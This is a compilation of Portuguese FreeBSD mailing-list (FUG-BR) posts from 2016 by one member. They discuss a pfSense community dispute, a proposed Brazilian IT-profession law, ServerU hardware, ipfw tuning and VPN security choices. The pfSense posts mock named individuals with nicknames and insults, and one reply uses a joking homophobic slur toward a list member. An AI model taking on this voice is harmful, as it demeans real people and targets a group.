Re: [FUG-BR] [OFF e chato] Banido do pfSense

[Evandro Nunes]

agora o biff tannen e seu sócio pokemon começaram a twitar citando o
twitter da fugbr hahaha jaja vão banir a fug inteira, e pior estão culpando
o gugabsd de cada opinião individual que cada um de nós (e olha que nos
meus calculos ja são mais de 10) temos sobre eles e a forma como estão
conduzindo o projeto

tenha piedade

vamos ver quanto tempo pra perceberem que não é uma opinião individual se
se derem ao trabalho de traduzir do portugues

ao que nivel baixaram o projeto



2016-08-01 20:43 GMT-03:00 Josias L. Gonçalves :

> Gustavo.
> Parabéns pelo teu trabalho ao longo deste tempo. Acompanho em silêncio e
> quase nunca me manifesto por escrito (preferindo exílio e outros caminhos),
> sempre enxergando sua dedicação e tempo nas respostas e resolução de
> problemas.
> Espero e desejo sinceramente que seu caminho com o freepf e no opnsense
> seja repleto sobretudo de respeito. Quanto ao pfSense, ele tomou outro rumo
> diferente. O sentimento é do filho mais velho ingrato que nos expulsa de
> casa, justamente o filho que mais trabalhamos em cima.
> Mas tranquilidade, nada no final foi e é perdido.
> Boa sorte nos novos ventos.
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF e chato] Banido do pfSense

[Evandro Nunes]

bom dia.
eu tambem ja bati de frente com esse cidadão em redes sociais.
a diferença é que não fui nem um pouco paciente, já mandei ele caçar
coquinho na segunda oportunidade.

realmente ele é invasivo.

na minha opinião inclusive foi ele quem deu takeover do pfsense brasil no
facebook, que estava em melhor mão com o gustavo, mas como ele mesmo faz
questão de bradar e latir como cachorro louco, ele é o copyright holder do
pfsense então deve ter usado disso pra "roubar" o pfsense brasil do guga.

o que é legal nem sempre é de direito, e na mão dele o facebook pfsense
brasil está mal servido como está o próprio projeto em si.

agora biff do back to the future HAHAHA foi genial!! é realmente a
caricatura perfeita desse cidadão
já o fake dele, o htilonom não é o jim realmente não, mas não é um fake
alheio ao projeto, é o paul arceneaux, sócio do jim e da jamie (casal 20,
mrs tannen esposa do biff tannen HAHAHAHA), ou seja eles estão sempre
orquestrados, sentam um do lado do outro e devem combinar a estratégia de
assédio, tem muito tempo livre esse povo isso sim, portanto é pior que ser
fake do gonzo, é de fato outra pessoa tão tóxica quanto o próprio, mas é
pior pq são 2 kkk

sobre o Chris ter ido pro Ubiquiti, uma pena realmente... e acho que
infelizmente é isso, quem assume a lideança é esse senhor, gonzo pancho
HAHAHA o que esperar do duturo de um projeto gerenciado não por um cara que
se auto nomeia gonzo pancho, o cavaleiro solitário do copyright HAHAHAHA

tem duas coisas que esse cidadão precisa entender e alguém precisa dar esse
recado:

1) o pfsense é muito maior que ele
2) o pfsense é como é hoje graças a pessoas como chris e scott, e hoje
ambos estão fora, então tem muita lacuna pra preencher
3) por hora desde que a netgate comprou o pfsense, só andou pra trás, a
inovação como alguém disse por aqui, acabou

ou seja ele ta se deleitando em uma historia de sucesso e software de
qualidade que precede ele, e por hora não fez nada que prove seu valor ao
projeto, ao contrario por hora ele só tem causado dano, nào sei se o
objetivo dele de aumentar lucratividade está alcançando, mas perder o
apreço da comunidade livre ele está conseguindo... se está ganhando da
comercial ja não sei...

agora Chris na Ubnt :(
uma perda! uma pena!

vida longa pfsense! venda logo o pfsense! ;-)





2016-08-01 11:36 GMT-03:00 Renato Frederick :

>
>
>
>
> De: Joao Rocha Braga Filho 
> Responder: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) <
> freebsd@fug.com.br>
> Data: 31 de julho de 2016 at 18:58:02
> Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) <
> freebsd@fug.com.br>
> Assunto:  Re: [FUG-BR] [OFF e chato] Banido do pfSense
>
> >
>
> Parece que este Jim adotou um bom caminho para matar o projeto.
>
> Esqueça ele. Se dedique a algum fork, faça-o prosperar em qualidade
> e adoção. E coloque nele as coisas boas que o pfSense perdeu, e as
> que ele não adotou.
>
>
> João Rocha.
> Tô quase mandando ele a M***a no facebook.. comunidade é PFSENSE BRASIL e
> o cara só responde em inglês… o #mimimi começou hoje sobre um post meu de
> neutralidade que estou conversando com Jack.
>
> Deve ser carente.
>
> O melhor indicativo se uma decisão foi boa ou não é o mercado.. basta
> aguardar uns anos e ver se prospera ou cai na lista de projeto morto
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Lei 607/2007 - Regulamentação da profissão Analista de sistemas e correlatas.

[Evandro Nunes]

2016-06-17 10:34 GMT-03:00 Márcio Luciano Donada :

> Bom dia senhores,
> Eu acredito que não se trata de sindicato e sim de um conselho, idêntico ao
> CRM, CREA assim como outros mais. As diferenças são gritantes entre se ter
> um sindicato e um conselho, neste projeto a ideia é um conselho.


marcio, bom dia

eu me referia ao sindicato ser o encaminhador do PL ao presidente da
republico e ser o maior (unico?) agregado promovendo o PL

mas claro que eles (ou outros) ja pensam em um conselho, para regular,
cobrar associação, pagamento mensal, registro único, e outros serviços...
se a lei passar.



> Não
> estamos livres dos sindicatos, até porque infelizmente está em nossa
> constituição artigo 8 inciso 3. O conselho pode, independente do projeto de
> lei e essas são as suas propostas, Habilitar legalmente os profissionais
> para o exercício da profissão, por meio da concessão do registro
> profissional, fiscalizar o exercício da profissão, cobrar anuidades,
> aplicar e cobrar multas, executar débitos, aplicar o Código de Ética
> Profissional, suspender e cassar registros.



provavelmente é exatamente aqui que alguém está de olho, é dinheiro e
poder, o que mais atrai abutres?



> A única coisa que vejo como
> vantagem em um sindicato é Homologar rescisões de contratos de trabalho.
> Demais são apenas para manter um bando de gente pra nada.
>

sindicato não tem vantagem alguma pra ninguem, nem pro trabalhador, patrão,
nem pra sociedade, o que um sindicato faz qualquer mas não é esse o ponto,
e sim a regulamentação inadequada e insuficiente da profissão, a
descaracterização, e de bônus a "oportunidade" de se criar um conselho pra
ditar regras, cobrar registro e mensalidade...


>
> Importantissimo ressaltar o item:
>
> Art. 2º
> III – os que, na data de entrada em vigor desta Lei, tenham exercido,
> comprovadamente, durante o período de, no mínimo cinco anos, a função de
> Analista de Sistemas e que requeiram o respectivo registro aos Conselhos
> Regionais de Informática.
>
> Veja que isso é o tão falado direito adquirido.


ou seja, "na data"

a partir dessa lei não existe mais espaço pros steve jobs, pros bill gates,
pros mark zuckenbergs eventualmente nascidos no brasil, os novos bill gates
e jobs e sucks jamais poderão ser considerados profissionais da área por
não serem formados

e todos serão reduzidos a analistas ou técnicos

você por exemplo é cientista da computação, não é? não não é, você será um
mero analista
meu chefe é engenheiro da computação, mas será um mero analista
se você fizer colégio técnico e cursos será um mero técnico...

mas o melhor programador assembly que temos aqui na casa, e o melhor
programador C que temos aqui na casa, que são respectivamente formados em
administração e história, que não tem um único curso na área, nem
certificado microsoft, cisco, lpi, nem nada, esses caras top sentados ao
meu lado não seriam NADA, nem analistas nem técnicos, nem poderiam ser
habilitados pelo "conselho", seriam profissionais não regulamentados
vivendo na clandestinidade se entrassem no mercado agora

ahh esse programador C que eu falei, que é o cara mais top nessa função com
quem eu trabalho, ele é formado em curso técnico de eletrônica e exerce a
profissão há 4 anos e uns quebrados, ou seja NOW()-4YEARS, não atende o
requisito da lei e hoje ele não seria NADA, nem autorizado a trabalhar pelo
"conselho" ou seria um profissional não regulamentado e eventualmente quem
desse emprego pra ele, que é um cara foda, poderia até ser multado pelo
"conselho" por empregar um profissional não regulamentado nem registrado
exercendo uma função crítica

é essa a realidade que você realmente acha que deveria ir adiante?

temos commiters brasileiros que não atendem a essa PL, e eles seriam NADA
hahaha, o marcelo tosatti quando virou mantenedor do linux 2.4 tinha 19
anos e nada de formação, ele seria um NADA perante o conselho, e não
autorizado a exercer a profissão

o menino la que faz o thundercache, mário, belo dia programava php e
resolveu aprender C pra criar plugins pro thundercache, em menos de 2 anos
ficou bom na parada, se fosse hoje com menos de 5 anos não poderia exercer
a profissão

a teoria do livro outliers propoe que pra voce ser realmente bom em alguma
coisa são necessários 10 anos ou 10 mil horas, pois bem 10k horas sao 4
anos e meio trabalhando 44h semanais naquele assunto dedicadamente, ou seja
esse menos de 5 anos, quantos especialistas de verdade não seriam
regulamentados nem autorizados a exercer a profissão mesmo hoje, hein? q
belo direito adquirido...

desculpa mas eu passo

e não, não estou defendendo o meu proprio umbigo, sou formado num curso
merda qualquer de processamento de dados, o que me da o mesmo titulo de
"analista" de um engenheiro de computação da COPPE com PHD da Unicamp,
hahaha "somos todos analistas" perante esse PL, hahaha mas sou pé no chão
pra saber que o fato deu ter diploma não significa nada perto da
experiência que essa galera que senta ao meu lado quase todo di

Re: [FUG-BR] servidor para escritorio

[Evandro Nunes]

>
>
>>
>> Já que estamos falando de serverU para proposito geral que é o inicio
>> desta thread.
>> Como é o suporte a IO de disco para o serverU ?
>> Lembrando que no ambiente discutido aqui não será necessário mais que
>> 1 placa de rede ( duas se por
>> o backup em barramento de rede separado ).
>
>

sata3 na south bridge
ou seja vai depender da velocidade do seu disco, com hdd voce nao consegue
tirar proveito total da porta, por isso eles entregam os ServerU SSD por
padrao, no site tem os numeros de referencia tanto pra tps (acessos por
segundo) quantos bytes, resumindo se não for SSD as serverU entregam mais
que o disco suporta...
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Interrupção alta no ServerU

[Evandro Nunes]

2016-06-17 16:28 GMT-03:00 ae moura :

>
> >
> > mete netmap-ipfw nisso ai e seja feliz
> >
> evandin sempre a frente do seu tempo rsrs
>

HAHAHA bixa militar enrustida

seu cenario ta bem legal, esta estavel o netmap-rt?

preciso voltar a trabalhar com roteamento, que é divertido, minha vida
virou GRC agora está um saco, preciso terminar meu serviço hahaha fui
"promovido" a especialista em OTRS só por causa de uma certificacao de
foundations, em terra de cego, eu sou o caolho, esse é o estado brasileiro

fala mais dessa gambiarra que você fez pra economizar máquina HAHAHA
crossover consigo mesmo, não cabia vale nisso? sei la valeA-valeB HAHAHA


> eu sou beta tester (cobaia? rsrs do netmap-rt):
>
> http://support.serveru.us/index.php?/ServerU/Knowledgebase/Article/View/90/21/roteamento-em-modo-netmap-com-netmap-rt-no-proapps
> não sei se é o caso seu sérgio mas além de netmap-ipfw pode ser uma boa
> tentar também com netmap-rt, eu uso os 2 mas não tenho centenas de pipes
> como você, tenho 4 pipes fazendo controle de DDoS
> meu ambiente por sugestão do patrick está assim
> igb2 => kipfw => igb3 => igb4 => netmap-rt => (vlan0, vlan1, vlan2 todas
> vlan da igb0 e igb1)
> ok não me batam hahaha a recomendação era ser 2 serverU mas eu só tinha
> uma pra esse ambiente tomando ataque, sim igb3+igb4 é cross na mesma
> máquina, não não gera loop nem transtorno, se o netmap-rt fica zoado eu
> mando pra outra maquina com freebsd normal roteando em kernel, se a maquina
> cai igb2-igb3 é bypass na serveru fica requintado rsrs
> no caso seu sérgio acho que seria diferente, teria que ser netmap-rt
> primeiro e netmap-ipfw depois pq pelo que entendo voce controla banda dos
> clientes na LAN no meu cenario eu controle DDoS na WAN
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Interrupção alta no ServerU

[Evandro Nunes]

nossa senhora 800 pares de pipe sao 1600 pipes, nao tem como suas 4 cpu vão
pra interrupção inteiras, até com metade disso (700 regras, 800 regras de
ipfw mandando pra pipe)

seu kernel (dummynet) deve estar com uns 20% de cpu no maximo, e os outros
80% interrupcao, isso não é problema do freebsd nem da L-400 e sim do
excesso de regras, tenta falar com o patrick na freebsd ele vai dar dicas
de como otimizar esse seu firewall e te dar dicas de tuning, mas não sei se
tem dicas de milagre..

se 1200 usuarios significam pra voce 2400 pipes voce precisa ir pra l-800

outra coisa da ipfw show e ve os clientes que mais contam pacotes

garanta que os mais frequentes estejam primeiro no seu firewall, pra evitar
lookups que não dão match e buscar match com poucos testes, first match
wins a seu favor

baixe o num_queues das placas de redes para 2, a l-400 tem só 4 cpu, tem
que diminuir a concorrencia pelos recursos

por último voce precisa se livrar do kernel

mete netmap-ipfw nisso ai e seja feliz

2016-06-17 10:48 GMT-03:00 Sergio Faulhaber :

> Caros,
>
> comprei um serveru lm-400 para substituir 4 pcs que tenho hoje fazendo
> autenticação de clientes.
> Uso o freebsd 10.2 nele e todas as placas rede são igb.
> Na autenticação do usuário é criado um par de regras pipe definindo a
> velocidade de conexão.
> Estou usando apenas 2 interfaces , uma no barramento principal e outra no
> barramento dos clientes.
> O problema que estou tendo é que com 800 usuários autenticados e e torno
> de 300 mbits/s emcada interface
> a interrupção esta beirando 90% e idle 0 .
> Me indicaram a refazer o firewall usando tables e criando poucas regras de
> pipe .
> Hoje com 800 usuários o firewall fica com 800 pares de pipe ( 1 in outro
> out) .
> Só que preciso de tempo para refazer o firewall e achava que o equipamento
> iria aguentar pelo menos 1200 usuarios.
> Tenho feito alterações no loader.conf e sysctl.conf mas estou na tentativa
> e erro.
> Já aumentei o kernel.hz para 2000 ,
> hw.igb.rxd="4096"
> hw.igb.txd="4096"
> e várias outros.
> Alguém teria alguma orientaçao para poder melhorar a performance ?
>
> Obrigado
>
>
> --
> *Sergio Faulhaber *
> Diretor Técnico
> telefone: (32) 2101-2028 / 2101-2000
> e-mail: ser...@acessa.com
> Av. Barão do Rio Branco, 2390 - Centro - 36.016-310
> Juiz de Fora - MG - www.acessa.com 
>
> /
>
> *Esta mensagem pode conter informações confidenciais e/ou privilegiadas.
> Se você não for o destinatário ou a pessoa autorizada a recebê-la, não pode
> usar, copiar ou divulgar as informações nela contidas ou tomar qualquer
> ação baseada nelas. Se você recebeu esta mensagem por engano, por favor,
> avise imediatamente o remetente, e em187.121.231.0/26 seguida, apague-a.
> Comunicações pela Internet não podem ser garantidas quanto à segurança ou
> inexistência de erros ou de vírus. O remetente, por esta razão, não aceita
> responsabilidade por qualquer erro ou omissão no contexto da mensagem
> decorrente da transmissão via Internet.
>
> /
>
>
> ---
> Este email foi escaneado pelo Avast antivírus.
> https://www.avast.com/antivirus
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Lei 607/2007 - Regulamentação da profissão Analista de sistemas e correlatas.

[Evandro Nunes]

2016-06-17 1:03 GMT-03:00 Fábio Rodrigues Ribeiro 
:

> Em 17/06/2016 00:59, Evandro Nunes escreveu:
>
>> perai
>> acho que tem um engano ai
>> o que o sindpd de sao paulo levou ao temer foi a PL/5101 de 2016, essa
>> aqui:
>>
>>
>> https://www.oficinadanet.com.br/imagens/post/10839/tramitacao-pl_5101-2016.pdf
>>
>> ou seja, nossa profissao com seus zilhoes de especializacoes e
>> especificidades a apenas 2 funcoes:
>>
>> - analista de sistema
>> - técnico em informática
>>
>> hahahaha
>>
>> ridiculo... e ainda pra ser analista terá que ter formação ou comprovar
>> experiencia, mas quem entrar no mercado depois da lei nao tera opcao de
>> comprovar será obrigatoriamente analista se tiver diploma, técnico se
>> tiver
>> cursinho técnico e afins, ou não será nada
>>
>> nos temos commiters do freebsd que não tem faculdade
>> nos temos desenvolvedores cobol, clipper, C, que nao tem faculdade
>> nos temos empreendedores criando empresas de ti sendo compradas pela
>> totvs,
>> que não tem faculdade
>>
>> sob a otica da regulamentacao proposta, esses não seriam nem analistas nem
>> tecnicos, seriam NADA, ou seja seria alguem alheio ao mercado, um
>> "profissional não regulamentado"
>>
>> só podia ser coisa de sindicato
>> ninguem sai ganhando com isso
>> ninguem
>>
>>
>>
>>
>>
>> 2016-06-16 11:40 GMT-03:00 Paulo Henrique - BSDs Brasil <
>> paulo.rd...@bsd.com.br>:
>>
>> Saudações,
>>> Sei que forge do escopo da lista, porém achei pertinente.
>>>
>>> Gostaria de saber qual a opinião de vocês quanto a lei 607/2007, que no
>>> caso tem o objetivo de "regulamentar" as profissões que envolvem a TI.
>>> Li algumas discussões na net, contudo a maioria escrita por jornalistas e
>>> não por profissionais da área.
>>>
>>> Tirando a unica coisa que ficou clara é o pagamento de taxa de expedição
>>> a
>>> institutos regulamentadores a mesma não falou muita coisa acerca do que é
>>> especialização e nem levou em consideração cursos de especialização no
>>> qual
>>> não requer um curso superior para ser um especialista.
>>>
>>> Escopo da Lei.
>>> http://legis.senado.leg.br/mateweb/arquivos/mate-pdf/11569.pdf
>>>
>>>
>>> --
>>> :UNI>>>
>>> Paulo Henrique.
>>> Fone: (21) 98253-9727 / (21) 3708-9388 <%20%2821%29%203708-9388>
>>> <%20%2821%29%203708-9388>
>>> Site: https://www.unixbsd.com.br
>>> Aka: NoRm4nD at FreeNode.Org
>>>
>>>
>>> -
>>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>>
>>>
>>> -
>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>>
>>
>
> Tem gente que ganha... Obviamente,  o sindicato!



ganha nada, leu a proposta de lei? ninguem ganha, nem sindicato.. todos so
perdem. olha isso:

Art. 6º A jornada de trabalho dos profissionais de que trata esta Lei não
excederá quarenta horas semanais, facultada a compensação de horários e a
redução de jornada, mediante acordo ou convenção coletiva de trabalho.
Parágrafo único. A jornada de trabalho dos profissionais submetidos a
atividades que demandem esforço repetitivo será de vinte horas semanais,
não excedendo a cinco horas diárias, nele computado um período de quinze
minutos para descanso.

ou seja quem trabalha montando maquina pra vender, so vai poder trabalhar
5h diaria e 20 semanais... hahahah maluquice, olha eu sou um ex aluno do
patrick tracanelli nas famosas madrugadas de curso de freebsd see HAHAHA os
caras dão tipo 20 horas de aula em 1 dia, que dira 1 semana HAHAHA a
freebsd vai ter que ter 1 instrutor por dia de aula pra nao exceder os
limites semanais HAHAHA

e aquela galera que vira a noite no data center? agora terao que ser
equipes multiplas trocando de turno igual chao de fabrica...

imagina uma equipe de QA fazendo baterias repetitivas de testes, tem que
trocar de turno a cada 5 horas, um programador - repeticao por definição
envolve ficar sentado digitando, da até insalubridade por lesão de esforço
repetititvo então claro que todo programador vira repetição e não poderão
trabalhar mais que 20h semanais...

é... parada é séria hahaha
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Lei 607/2007 - Regulamentação da profissão Analista de sistemas e correlatas.

[Evandro Nunes]

perai
acho que tem um engano ai
o que o sindpd de sao paulo levou ao temer foi a PL/5101 de 2016, essa aqui:

https://www.oficinadanet.com.br/imagens/post/10839/tramitacao-pl_5101-2016.pdf

ou seja, nossa profissao com seus zilhoes de especializacoes e
especificidades a apenas 2 funcoes:

- analista de sistema
- técnico em informática

hahahaha

ridiculo... e ainda pra ser analista terá que ter formação ou comprovar
experiencia, mas quem entrar no mercado depois da lei nao tera opcao de
comprovar será obrigatoriamente analista se tiver diploma, técnico se tiver
cursinho técnico e afins, ou não será nada

nos temos commiters do freebsd que não tem faculdade
nos temos desenvolvedores cobol, clipper, C, que nao tem faculdade
nos temos empreendedores criando empresas de ti sendo compradas pela totvs,
que não tem faculdade

sob a otica da regulamentacao proposta, esses não seriam nem analistas nem
tecnicos, seriam NADA, ou seja seria alguem alheio ao mercado, um
"profissional não regulamentado"

só podia ser coisa de sindicato
ninguem sai ganhando com isso
ninguem





2016-06-16 11:40 GMT-03:00 Paulo Henrique - BSDs Brasil <
paulo.rd...@bsd.com.br>:

> Saudações,
> Sei que forge do escopo da lista, porém achei pertinente.
>
> Gostaria de saber qual a opinião de vocês quanto a lei 607/2007, que no
> caso tem o objetivo de "regulamentar" as profissões que envolvem a TI.
> Li algumas discussões na net, contudo a maioria escrita por jornalistas e
> não por profissionais da área.
>
> Tirando a unica coisa que ficou clara é o pagamento de taxa de expedição a
> institutos regulamentadores a mesma não falou muita coisa acerca do que é
> especialização e nem levou em consideração cursos de especialização no qual
> não requer um curso superior para ser um especialista.
>
> Escopo da Lei.
> http://legis.senado.leg.br/mateweb/arquivos/mate-pdf/11569.pdf
>
>
> --
> :UNI>
> Paulo Henrique.
> Fone: (21) 98253-9727 / (21) 3708-9388 <%20%2821%29%203708-9388>
> Site: https://www.unixbsd.com.br
> Aka: NoRm4nD at FreeNode.Org
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] servidor para escritorio

[Evandro Nunes]

verdade, bem observado

um dell miniserver ou HP com xeon, ao final de 2 anos terá custado outro
serveru l-400 só em energia elétrica

sem falar em segregação de ambiente, 6 portas intel igb(4) ao invés de
broadcom ou realtreco

esses dias eu precisei de uma dual port igb pra um server convencional, fui
comprar do meu fornecedor usual, a sinco no RJ e estava saindo R$ 1.500,
não reclamo, sei que é isso mesmo, com esse dolar... então pensa, pra ter 6
portas igb vai custar... 4.500, outra serveru l-400

ou seja o custo final de propriedade, real$ por real$, a l-400 é melhor
opção pra qualquer gestor que saiba calcular TCO e ROI básico... e se a
empresa suportar alimentação -48v então, as l-400 podem vir com fonte 48v
sem custo adicional, a energia elétrica e resfriamento (ar condicionado)
agradecem...

além de ser 8gb ram + SSD

perfeito pra ZFS



2016-06-16 15:53 GMT-03:00 Paulo Henrique - BSD Brasil <
paulo.rd...@bsd.com.br>:

>
>
> On 16/06/16 15:11, Fábio Rodrigues Ribeiro wrote:
> > Em 16/06/2016 14:21, Otavio Augusto escreveu:
> >> Em 16 de junho de 2016 11:07, Paulo Henrique - BSDs Brasil
> >>  escreveu:
> >>>
> >>>
> >>> On 16/06/2016 10:27, Neilson Lima wrote:
> 
>  Em 15 de junho de 2016 10:22, Paulo Henrique - BSD Brasil <
>  paulo.rd...@bsd.com.br> escreveu:
> 
> >
> > On 15/06/16 09:56, Neilson Lima wrote:
> >>
> >> Bom dia, Pessoal!
> >>
> >> Um primo tem um escritório trabalhista e me pediu para analisar a
> >> parte
> >
> > de
> >>
> >> informática. Identifiquei algumas necessidades, umas delas é a
> >> falta de
> >
> > um
> >>
> >> servidor(impressora, arquivos, backup..etc). Nesse caso o que
> >> vocês tem
> >> feito e/ou recomenda para termos aqui um ambiente profissional?
> >> Se usam
> >
> > um
> >>
> >> único servidor para gerenciar tudo? Me deem exemplos para que eu
> >> tenha
> >
> > uma
> >>
> >> visão melhor do cenário, por favor.
> >>
> >> Agradeço desde já pela sua atenção.
> >>
> >> Abs
> >>
> > Saudações,
> >
> > Bom se a necessidade é somente um servidor para gerir as estações de
> > trabalho e prover serviços de compartilhamento de arquivos e
> > impressão
> > eu recomendaria a solução abaixo ( considerando que seja um ambiente
> > pequeno, até 30 estações )
> >
> > Hardware: ServerU-L400 com dois discos de pelo menos 500gbytes
> > OS: FreeBSD 10.3
> > Servidor de Diretorios/Compartilhamento de Arquivos: Samba Server 4.1
> > Servidor de Impressão: CUPS, ou adquira printservers e use eles.
> > Servidor de Anti-virus: Integrado ao Samba AmavisD.
> >
> > Frescura de analista de sistemas:
> > Nesse mesmo servidor, por ser ambiente pequeno colocaria junto.
> > Zabbix com banco de dados PostgreSQL e ICS Invectory só para
> > manter um
> > monitoramento das rede.
> > E se sobrar recursos computacionais, nada que um JabberD não faria
> > uma
> > baita diferença na comunicação interna.
> > Arriscaria a colocar outro servidor com configurações bem semelhantes
> > com o PFSense para fazer controle de conteudo e uma configuração
> > basica
> > de firewall
> >
> > Abraços !!
> >
> > --
> > ##
> > :UNI> > Paulo Henrique
> > Cel: (21) 98253-9727
> > Fone: (21) 3708-9388
> > ##
> >
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>  Saudações, Amigo
> 
>  Suas dicas foram ótimas, vou tentar fazer algo nesse estilo com um
>  servidor
>  no estilo que *Paulo* recomendou. Acredito que seja o suficiente com
>  preocupação mesmo na parte de armazenamento de dados que deva ser
>  grande.
> 
>  Abs
> 
> 
> >>> Saudações,
> >>>
> >>> Então, algumas considerações se for seguir a linha do serveru L-400
> >>> com ZFS
> >>> que o Paulo Cavalcanti falou.
> >>> ZFS consome muito recursos de memoria para o ARC, quando comprar já
> >>> solicita
> >>> com o maximo de memoria que o L400 suporta.
> >>> Quanto a disco, se estiver com money disponivel para fazer algo
> >>> realmente
> >>> bom, recomendo usar discos SATA3 WD RE4 Gold.
> >>> Se for usar ZFS não use nenhuma controladora Raid entre o ZFS e os
> >>> discos.
> >>> Não consegui compreender no datasheet se o serverU suporta dois
> >>> discos SATA
> >>> + 1 SSD ou se é apenas dois canais de comunicação SATA.
> >>> Uma outra observação é compilar o kernel e alterar os limites de
> >>> MAX_OPEN_FILES, MAX_USERS pois DC abre muito arquivo, principalmente se
> >>> estiver utilizando perfil etinerante.
> >>> Há diversas outras otimizações que recomendo fazer no kernel do
> >>> sistema,
> >>> aumenta tanto

Re: [FUG-BR] Segurança do PPTP para poucos acessos

[Evandro Nunes]

openvpn e' seguro ate que se diga o contrario, e com tanto que bem
configurado
o problema e que se diz o contrario com muita frequencia, 9/10 falhas que
afetam openssl/https afetam o openvpn, ate falhas externas, como
shellshock, afetaram-no, sem falar de heart bleed, renegotiation, mitm
diversos, etc, etc

acho que os pontos delimitados pelo ricardo ferreira deixam claro isso, pro
openvpn ser confiavel requer bastante esforco, abrir mao de psk, entregar
certificados offband (sem configuration pull) somados com passphrase local
numa relacao 1:1 com servidor, garantir autenticidade mutua (cliente
autentica servidor, nao so servidor autentica cliente), compilar com
polarssl (libressl e uma boa mas novo, entao usa-lo pode significar abrir
mao de algum recurso pelo que li)

ou seja o ricardo e' um cara de seguranca, de uma empresa onde seguranca e'
o negocio fim, tem um belo checklist de hardening e esperamos um bom
processo de validacao/auditoria da base instalada pra garantir que o
hardening que a organizacao definiu como baseline pra compliance interno e
de terceiros esteja sendo cumprido (auditoria)

pros outros 99% dos usuarios normais, sobem de qualquer jeito com o
primeiro how-to que funcionar, invariavelmente com cifradores frageis,
passphrase, com renegotiate ligado permitindo mitm, chaves fracas, sem
elipitic curve, etc

ainda assim, se pegar o e-mail do ricardo e transformar em checklist,
estara seguro ate que se descubra o proximo 0-day do openvpn ou do ssl/tls
(especificacao) ou de uma lib usada (openssl, polarssl), e ai correr atras
de patchear servidores e invariavelmente tambem clientes, etc, etc

eu vou de IKEv2 ou L2TP+IPSec, e OpenVPN so' se for com certificados +
entrega offband + PFS, e mesmo assim um olho no gato outro no peixe

otima discussao parabens aos envolvidos

sobre PPTP acho que ja ficou claro ne? esquece! rsrsrs




2016-04-28 15:40 GMT-03:00 Ricardo Ferreira 
:

>
> Em 28/04/2016 14:29, Ze Claudio Pastore escreveu:
>
>> Esquece PPTP se segurança realmente importa.
>>
>> PPTP não tem bug, ele é o bug. É arquiteturalmente fraco, ou seja não é
>> uma
>> falha, ele é a falha, não da pra corrigir porque é como é simplesmente por
>> ser. Outra afirmação errada é falar que PPTP tem baixa segurança. Mentira,
>> pra ter baixa segurança precisa ter alguma, PPTP não tem nenhuma.
>>
>> Quanto ao número de pessoas acessando também importa pouco, o que conta é
>> a
>> relevância daquela pessoa ainda que seja só uma, e qual a exposição dela
>> ao
>> risco. Olhe pra PPTP no máximo como uma forma fácil de tunelamento,
>> inclusive sugiro PPTP com compressão e SEM CRIPTOGRAFIA HAHAHA pq no final
>> das contas da no mesmo, criptografia no PPTP é só overhead, pq segurança
>> não tem nenhum ganho de fato.
>>
>> Isso você realmente quer segurança use VPN de verdade.
>>
>> E VPN de verdade não inclui OpenVPN com suas heranças de falhas de
>> OpenSSL,
>> ataques de renegotiate e tantas outras falhas que em geral afetam tudo que
>> é tunelado sobre SSL (não apenas HTTPS).
>>
>> Vá de IPSEC ou L2TP+IPSec.
>>
>> O resto ou é lixo (pptp), ou é só ruim mesmo (openvpn).
>>
>>
>>
>> Em 28 de abril de 2016 13:51, Paulo Henrique 
>> escreveu:
>>
>> Em 28 de abril de 2016 09:37, Tales Rodarte 
>>> escreveu:
>>>
>>> Em 28-04-2016 08:48, Thiago Andrighetti de Pádua escreveu:

 Olá lista!!!
> Eu preciso implementar um servidor de VPN aqui no provedor onde
> trabalho
> para acesso externos aos equipamentos etc.
> Hoje quando preciso, faço tunel SSH, mas não é nada prático.
> Eu ia implementar um servidor PPTP com o MPD, mas muitos dizem que tem
> muitos bugs, que a segurança do PPTP é falha, etc...
> Mas por outro lado eu vou ter 3 ou 4 pessoas no máximo que vai acessar
> essa
> VPN, e algumas estão meio resistentes à ter que configurar openvpn,
> certificados e tudo mais, usuário mais leigo, sendo que um PPTP
> qualquer
> windão configura facil.
>
> Bem, gostaria da opinião dos senhores quanto à essa implantação do
> PPTP,
> realmente estou colocando a minha rede em risco? Tenho realmente que
>
 tacar
>>>
 um openvpn? e se o chefe estiver viajando e em outro PC, e quiser
>
 acessar
>>>
 algo aqui? não levou os certificados e tudo mais...
>
> Bem, qualquer ajuda é bem vinda.
>
> Obrigado.
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
> Olá Thiago,

 Na minha opinião segurança nunca é demais.
